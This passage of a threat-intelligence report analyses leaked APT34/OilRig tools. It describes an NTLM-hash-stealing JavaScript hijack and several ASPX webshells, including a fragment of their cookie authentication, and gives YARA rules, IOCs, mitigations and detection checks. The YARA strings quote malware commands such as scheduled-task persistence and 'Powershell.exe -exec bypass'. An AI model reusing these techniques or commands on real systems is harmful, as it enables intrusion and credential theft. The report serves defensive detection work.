Meanwhile, this tool records header information involved in HTTP interactions, including the user's IP address, request time, requested content, and recorded cookies. When analyzing the tool code, we found hijacking code, i.e., the following JavaScript statement:

script = ';\$(document).ready(function(){\$(\'\');});' days = 3000

When the hijacking code executes, the first img src leads the victim's machine to access **logo.jpg** on the attacker's server. During the process, NTLM authentication will be conducted automatically to allow the attacker to obtain the NetNTLMv2 hash which can be used for man-in-the-middle (MITM) attacks.

Assume that the attacker has taken control of the proxy. In this case, he can use his server to respond to DNS requests to WPAD, and then answer requests to obtain images that are actually PAC files.

3.4 Webshells_and_Panel

The Webshells_and_Panel directory contains multiple WebShell tools written in C#:

simpleDownload.aspx: a simple tool only with the upload function.

Browse... No file selected. Upload

simple.aspx: a relatively complicated tool to provide authentication and command execution functions besides the upload function.

assword :		Login	
command :		Execute	
lpload :	Browse No file selected.		Upload

highshell.aspx: a full-featured tool that seems like the first version, providing functions like file upload, command execution, and database manipulation. This version of tool was reported by Palo Alto Networks in 2017.

Main	Explorer	
Address	Current :	Ctinebublewwrootaspnet_clienti Use Reset Form W
Login	Do il ;	Doit
Commar	Process : Command :	ond.exe Execute
Upload	File name : Save as : New File name :	Browse_ No file selected. Is virual path Upload
Downloa	d File name :	Download
Upload Bar	Base64 File : File Path and Name :	A Is vitual path Upload
Sql Serv	Connection String : Query :	Standard Connectin Sample Trusted Connectin Sample Run
Change Creation T	File name : From This File : New Time :	Get Set

This tool implements login authentication as follows:

void c(string p){try{HttpCookie coo=new HttpCookie("p",tb(p));coo.Expires=DateTime.Now.AddDays(1); System.Security.Cryptography.SHA256CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(fb (e.Message);}rm();return false;}

The following shows how login authentication is implemented via pseudocode:

Base64(sha256(bytes(cookies["p"] + salt))) == pp

Both **salt** and **pp** are predefined values.



The configured cookie value can be used for authentication.

In addition, we have found multiple upgraded versions (minor differences exists between them) of HighShell in the Hypershell directory. The following figure shows HighShell 8.6.2.



This version of tool is rewritten with the Semantic UI framework and its backend has been split into several modules. Arguably, this version goes further in engineering than common versions. Like other versions, this version performs authentication based on cookies.

4 YARA Rules

/*
YARA Rule Set
Author: Florian Roth
Date: 2019-04-17
Identifier: Leaked APT34 / OilRig tools
Reference: https://twitter.com/0xffff0800/status/1118406371165126656
*/
rule APT_APT34_PS_Malware_Apr19_1 {
meta:
description = "Detects APT34 PowerShell malware"
author = "Florian Roth"
reference = "https://twitter.com/0xffff0800/status/1118406371165126656"

```
date = "2019-04-17"
```

```
hash1 = "b1d621091740e62c84fc8c62bcdad07873c8b61b83faba36097ef150fd6ec768"
```

strings:

```
$x1 = "= get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID"
ascii
```

```
$x2 = "Write-Host \"excepton occured!\"" ascii /* 🙂 */
```

```
$s1 = "Start-Sleep -s 1;" fullword ascii
```

```
$s2 = "Start-Sleep -m 100;" fullword ascii
```

condition:

```
1 of ($x*) or 2 of them
```

}

```
rule APT_APT34_PS_Malware_Apr19_2 {
```

meta:

description = "Detects APT34 PowerShell malware"

author = "Florian Roth"

```
reference = "https://twitter.com/0xffff0800/status/1118406371165126656"
```

date = "2019-04-17"

hash1 = "2943e69e6c34232dee3236ced38d41d378784a317eeaf6b90482014210fcd459"

strings:

\$x1 = "= \"http://\" + [System.Net.Dns]::GetHostAddresses(\"" ascii

```
$x2 = "$t = get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID"
fullword ascii
```

\$x3 = "| Where { \$_ -notmatch '^\\s+\$' }" ascii

\$s1 = "= new-object System.Net.WebProxy(\$u, \$true);" fullword ascii

\$s2 = " -eq \"dom\"){\$" ascii

```
$s3 = " -eq \"srv\"){$" ascii
```

```
$s4 = "+\"<>\" | Set-Content" ascii
```

condition:

```
1 of ($x*) and 3 of them
```

```
}
```

```
rule APT_APT34_PS_Malware_Apr19_3 {
```

meta:

description = "Detects APT34 PowerShell malware"

author = "Florian Roth"

reference = "https://twitter.com/0xffff0800/status/1118406371165126656"

date = "2019-04-17"

hash1 = "27e03b98ae0f6f2650f378e9292384f1350f95ee4f3ac009e0113a8d9e2e14ed"

strings:

\$x1 = "Powershell.exe -exec bypass -file \${global:\$address1}"

\$x2 = "schtasks /create /F /ru SYSTEM /sc minute /mo 10 /tn"

\$x3 = "\"\\UpdateTasks\\UpdateTaskHosts\""

\$x4 = "wscript /b \\`\"\${global:\$address1" ascii

\$x5 = "::FromBase64String([string]\${global:\$http_ag}))" ascii

\$x6 = ".run command1, 0, false\" | Out-File " fullword ascii

\$x7 = "\\UpdateTask.vbs" fullword ascii

\$x8 = "hUpdater.ps1" fullword ascii

condition:

1 of them

```
}
```

Source: https://github.com/Neo23x0/signature-base/blob/master/yara/apt_oilrig.yar

5 Indicators of Compromise

myleftheart.com

C:\Users\Public\Public\atag[0-9]{4}[A-Z]{2}

C:\Users\Public\Public\dUpdater.ps1

C:\Users\Public\Public\hUpdated.ps1

C:\Users\Public\Public\UpdateTask.vbs

27e03b98ae0f6f2650f378e9292384f1350f95ee4f3ac009e0113a8d9e2e14ed

b1d621091740e62c84fc8c62bcdad07873c8b61b83faba36097ef150fd6ec768

2943e69e6c34232dee3236ced38d41d378784a317eeaf6b90482014210fcd459

07e791d18ea8f2f7ede2962522626b43f28cb242873a7bd55fff4feb91299741 dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229 3ca3a957c526eaeabcf17b0b2cd345c0fffab549adfdf04470b6983b87f7ec62 c9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e a6a0fbfee08367046d3d26fb4b4cf7779f7fb6eaf7e60e1d9b6bf31c5be5b63e fe1b011fe089969d960d2dce2a61020725a02e15dbc812ee6b6ecc6a98875392

- 185.***.***.61
- 46.***.***.196
- 185.***.***.80
- 185.***.17
- 185.***.***,252
- 185.***.***.103
- 70.***.***.34
- 109.***.129
- 185.***.***.140
- 185.***.***.158
- 178.***.***.230
- 146.***.***.108
- 23.***.***.76
- 185.***.***.8
- 95.***.172
- 173.***.***.194
- 173.***.201
- 172.***.***.238
- 23.***.***.69
- 185.***.***.86
- 185.***.***.56

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185.***.***.75

185.***.***.35

- 185.***.***.14

- 194.***.***.10
- 194.***.***.23
- 142.***.***.99
- 95.***.173
- 103.***.***.14
- 172.***.***.226
- 185.***.***.35
- 46.***.***.52
- 217.***.122
- 103.***.***.181
- 190.***.***.59
- 88.***.***.174
- 176.***.***.215
- 38.***.***.153
- 168.***.***.92
- 158.***.***.62

- 213.***.***.9

- 198.***.***.22

- 185.***.***.157

- 46.***.***.42
- 213.***.***.32
- 81.***.249
- 185.***.***.63

194.***.***.15

185.***.***.157

185.***.***.59

185.***.***.217

23.***.***.6

185.***.***.63

6 Mitigations

- 1. Be cautious with emails from unknown sources. Do not open emails from strangers, such as those containing links, so as to prevent information disclosure or computer viruses.
- 2. Do not use weak passwords. Change passwords frequently and make sure strong enough passwords are used.
- 3. Fix vulnerabilities in time, especially those in border devices. Enable automatic update on notfrequently-used devices to keep the devices and their software latest.
- 4. Deploy border protection devices and an intelligence-based alerting system provided by security firms to nip security hazards in the bud.

7 Detection Means

Network layer:

Check whether there are abnormal DNS parsing server addresses.

Check whether machines within the network send a great number of DNS requests every 50 ms.

Check whether there are abnormal domain name requests.

Host layer:

Check whether the following directories or files exist on hosts:

C:\Users\Public\Public\atag[0-9]{4}[A-Z]{2}

C:\Users\Public\Public\dUpdater.ps1

C:\Users\Public\Public\hUpdated.ps1

C:\Users\Public\Public\UpdateTask.vbs

Check whether DNS server addresses are tampered with on hosts.

Check whether unknown files exist in the root directory of the HTTP server.

8 References

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OilRig Performs Tests on the TwoFace Webshell

OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government

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https://anonfile.com/8f8aL0S1mb/targets_txt